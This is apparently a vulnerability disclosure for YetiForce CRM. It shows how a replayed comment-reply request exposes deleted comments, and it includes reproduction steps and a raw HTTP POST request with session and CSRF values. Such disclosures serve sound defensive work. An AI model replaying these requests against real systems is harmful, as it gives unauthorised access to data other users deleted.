Description

When a user creates a new record he can add a comment on it. The user is also able to delete the comments after which the user wont be having access to that comment like replying, checking what the comment was. This vulnerability allows any user to see what the deleted comment was and also to reply on that comment.

Proof of Concept

1.Login into the application https://gitstable.yetiforce.com/index.php?module=Accounts&view=Detail&record=2029 .

2.Go to create records and create new.

3.Enter a new comment and click on save.

4.Reply on the comment created and intercept the request.

5.Send the request to the repeater.

6.Delete the comment that you created.

7.Send the request in the repeater and the details of the deleted comment is exposed.

POST /index.php HTTP/1.1
Host: gitstable.yetiforce.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 153
Origin: https://gitstable.yetiforce.com
Connection: close
Cookie: YTSID=50trt9s5he1qontpsn2ktvdab9; _pk_id.10.6d7c=d037ceed70283778.1663586607.; _pk_ses.10.6d7c=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

_csrf=sid:3eb187103ad72d3dbb5c9c5cbe0d059c0111704b,1663590705&action=SaveAjax&commentcontent=test&related_to=2029&module=ModComments&parent_comments=2054```



# Impact

The user can get details of all the comments that were deleted by other users.